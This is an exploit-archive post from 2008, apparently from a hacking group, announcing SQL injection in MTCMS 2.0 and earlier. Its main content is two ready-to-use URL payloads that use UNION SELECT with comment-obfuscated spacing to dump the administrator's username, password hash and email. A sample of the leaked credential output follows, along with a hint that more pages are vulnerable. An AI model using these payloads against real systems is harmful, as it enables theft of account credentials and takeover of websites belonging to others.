MTCMS <= 2.0 Remote SQL Injection Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MTCMS <= 2.0 Remote SQL Injection Vulnerabilities
# Published : 2008-01-10
# Author : Virangar Security
# Previous Title : DomPHP <= 0.81 Remote Add Administrator Exploit
# Next Title : DomPHP 0.81 (index.php page) Remote File Inclusion Vulnerability

#######################################################################
#                                                                     #
#    ...:::::MTCMS <=2.0  SQL Injection Vulnerbility ::::....         #           
#######################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By :hadihadi

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
----------
vules:
http://site.com/patch/?a='/**/union/**/select/**/1,concat(0x23,username,0x5f,password,0x23),email,4,5,6,7/**/from/**/users/**/where/**/id=1/*
http://site.com/patch/?a=downloads&cid='/**/union/**/select/**/1,concat(0x23,username,0x5f,password,0x23),email,4,5,6,7/**/from/**/users/**/where/**/id=1/*

-------------------------------------
you can see some thing similar to:
#admin_35a6e23edefc651ef0380b277ce5d709#
Admin@service.com
-------------------------------------
MTCMS contains of other bugs in other pages ;)
& maybe other versions have Vulnerbility too :)

# www.Syue.com [2008-01-10]